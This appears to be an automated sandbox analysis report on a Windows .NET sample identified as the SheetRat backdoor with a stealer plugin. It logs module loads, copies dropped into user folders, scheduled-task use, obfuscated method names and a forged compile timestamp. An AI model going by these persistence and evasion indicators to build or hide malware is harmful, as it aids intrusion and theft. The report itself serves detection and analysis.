Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: perfdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: perfnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: perfproc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: sysmain.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: rasctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: tapiperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: perfctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: usbperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: version.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: edgegdi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: sxs.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: devenum.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: devobj.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: msasn1.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: msdmo.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: version.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: edgegdi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: sxs.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: devenum.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: devobj.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: msasn1.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: msdmo.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: version.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: edgegdi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: sxs.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: devenum.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: devobj.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: msasn1.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: msdmo.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Section loaded: secur32.dll

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

.NET source code contains potential unpacker

Source: CVmkXJ7e0a.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CVmkXJ7e0a.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: CVmkXJ7e0a.exe

Static file information: File size 1070080 > 1048576

Source: CVmkXJ7e0a.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x104800

Source: CVmkXJ7e0a.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\Sheet rat v 2.2\Src\SheetRat\bin\Release\Plugins\Stealer.pdb source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\SheetRat\SheetRat\bin\Release\Stub\UserMode.pdb source: CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BD1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: CVmkXJ7e0a.exe, IgIWsrqHbBFTbcX.cs

.Net Code: FLteplLVvCYzU

Source: CVmkXJ7e0a.exe

Static PE information: 0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Code function: 0_2_00007FFE6F7D00BD pushad ; iretd	0_2_00007FFE6F7D00C1
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 15_2_00007FFE6F7E00BD pushad ; iretd	15_2_00007FFE6F7E00C1
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 25_2_00007FFE6F7C00BD pushad ; iretd	25_2_00007FFE6F7C00C1
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 32_2_00007FFE6F7B00BD pushad ; iretd	32_2_00007FFE6F7B00C1
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 42_2_00007FFE6F7E00BD pushad ; iretd	42_2_00007FFE6F7E00C1
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Code function: 52_2_00007FFE6F7C00BD pushad ; iretd	52_2_00007FFE6F7C00C1
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Code function: 62_2_00007FFE6F7D00BD pushad ; iretd	62_2_00007FFE6F7D00C1

Source: CVmkXJ7e0a.exe, QtwIwyeuCut.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'nrutJLkRFakB', 'JLquHAhAvh', 'gWbxObHdxcm', 'EcPnPsSpJv', 'mmnzvtLZsKaMmk', 'CdTGDoWsmSsMSH', 'rKleoKbcMjlC', 'IdPcDcpoWCrDQuB', 'DhtRPSPbIvcbB'
Source: CVmkXJ7e0a.exe, WgycmGATDTmLWZ.cs	High entropy of concatenated method names: 'uLTOBtxNjseq', 'ibnluuqxzeEbX', 'BVaodUJaWcK', 'vYTOjHPPlcfA', 'bifvgOmeUw', 'IDBWbHELaQzRel', 'wMHoZpaXBleeqNX', 'bcaFgGto', 'XUaAcRAKlSaW', 'WDifAkxcNyCP'
Source: CVmkXJ7e0a.exe, vWnlBIwOqRcKUR.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'bkdRmlQOhbi', 'PDlmKZeO', 'dRGKYcGMjukf', 'VRqTOCfI', 'KTDhKEeS', 'qCuxSXHNIJCxg'
Source: CVmkXJ7e0a.exe, vQegNNngXJL.cs	High entropy of concatenated method names: 'UiJafUCaHMtZbNs', 'mKPrlnlWrqalgt', 'OtgEwrnu', 'MmLiWFEzVwu', 'tUOgxmipt', 'tOLffvJvyy', 'peycCzmlaQ', 'yoUZSXzEFEfvs', 'XrZJpZxvwEpPDun', 'ETzJQWLGdlvutLK'
Source: CVmkXJ7e0a.exe, BOpXVWocCcdc.cs	High entropy of concatenated method names: 'sJrdjBADXvMl', 'mUsTnbFm', 'HBedZKdgoqBuP', 'DQAXEdeScmR', 'UkjpBXoGCpzGc', 'ZqHVkIXAoCnDBJ', 'oYrLppsxz', 'dGIRNQtvODoLGB', 'MTvgByWfz', 'QHumAhsIgG'
Source: CVmkXJ7e0a.exe, jPIdXbLyOdAp.cs	High entropy of concatenated method names: 'dVIRaIRaqGrooo', 'RigeHlKpgF', 'wgrohkQPR', 'TktxzDsJRojm', 'ggwWhDTfcMRMliC', 'GYYXoyxngIh', 'fOQaJmKIkN', 'MywrYclOUpjLQ', 'PGhiJpZVB', 'NvqDyXup'
Source: CVmkXJ7e0a.exe, ncogkvKUZZJb.cs	High entropy of concatenated method names: 'KgTAEoBHaun', 'ctbFTbOuy', 'MNsVAyXEpOdffGz', 'MKDUNiAX', 'BiOFyuhWK', 'FHioCjWEYfx', 'UGOODreldM', 'NyPJyqUvIUm', 'xdWAkrecsKmOHrk', 'qrYrsmVpmZXNDk'
Source: CVmkXJ7e0a.exe, EwPduhLHZPgxos.cs	High entropy of concatenated method names: 'dCvIlmtZV', 'gjusZVjlaANSD', 'haJvjFTH', 'cFxnBXELWusOxR', 'zuwLNrtLys', 'KdyqPRYvRnci', 'NVpqYLpjIvvpJ', 'uwjuzuZMb', 'gebpCAaXMN', 'sCCmnCrBhCAGJez'
Source: CVmkXJ7e0a.exe, oxEMBVqDbyL.cs	High entropy of concatenated method names: 'UiCdwQwMgJ', 'brWhHvyVy', 'GzIQbwxfzLCqY', 'vrWFjmgnfqdVfo', 'HccNhNjuMUTzh', 'xEkSglQYtmMCT', 'RnFRIwriZdr', 'MwKkPmyGhmsC', 'CSjjqBeuPdZPCql', 'PeHbDYTOIXZDNm'
Source: CVmkXJ7e0a.exe, JygXmthhijkCb.cs	High entropy of concatenated method names: 'dMDVFZFKF', 'FtpPReDPEtFk', 'lJiDkcILXX', 'WrfKUchysAStES', 'EfUxhGtuSM', 'VUhxUhWAsZy', 'ubMGrSSPelUXcq', 'pjdxNyxHMRu', 'kXEaqGmaVVzB', 'AwtkAJVeIgQO'
Source: CVmkXJ7e0a.exe, epWAKQgX.cs	High entropy of concatenated method names: 'ihmOmTPHFJ', 'iuYQkEvuVSEMs', 'ObMtnuATnRUKWnu', 'pVfGTjRFPGUm', 'veUtQXsD', 'ROgOHGwahH', 'scihlefK', 'dhaORrnAR', 'QBZbDQaE', 'KIpYMmJTvmHm'
Source: CVmkXJ7e0a.exe, cMwXeZCTrGi.cs	High entropy of concatenated method names: 'ZUHnyFspgofsNyT', 'CVgoQnIWfdOQdsC', 'TqGZwKen', 'xsngDJfGGQ', 'ZtilMlHVqcM', 'mZZWrtzsqtWSvU', 'cTiJWbggZIUNKC', 'wplDBHdnn', 'HYfgWPqrwf', 'HSpMFsAO'
Source: CVmkXJ7e0a.exe, NazdjKhCsN.cs	High entropy of concatenated method names: 'AVOGwgUEeiyJ', 'EScmHVJGlMMIg', 'PJyqcwqBDh', 'uwNXLiOQP', 'QhuuWEVOJBy', 'PFvgsWMuCP', 'bNZvjadyrRrzbDv', 'sUnufMdg', 'beqsEUWAm', 'hwImnfDGzX'
Source: CVmkXJ7e0a.exe, vYxBOCMJ.cs	High entropy of concatenated method names: 'JLNZNSqKLhz', 'dXAruXIaRZ', 'hyWggcAdfdXqZm', 'zNBVnwOp', 'AxJTeEjFkX', 'bqlKiLDTmGhaF', 'XvYwlrSJEfiSgzb', 'RGCFZJbrmbsuDL', 'XEZHILIzfNS', 'GbPeEssoaXzUO'
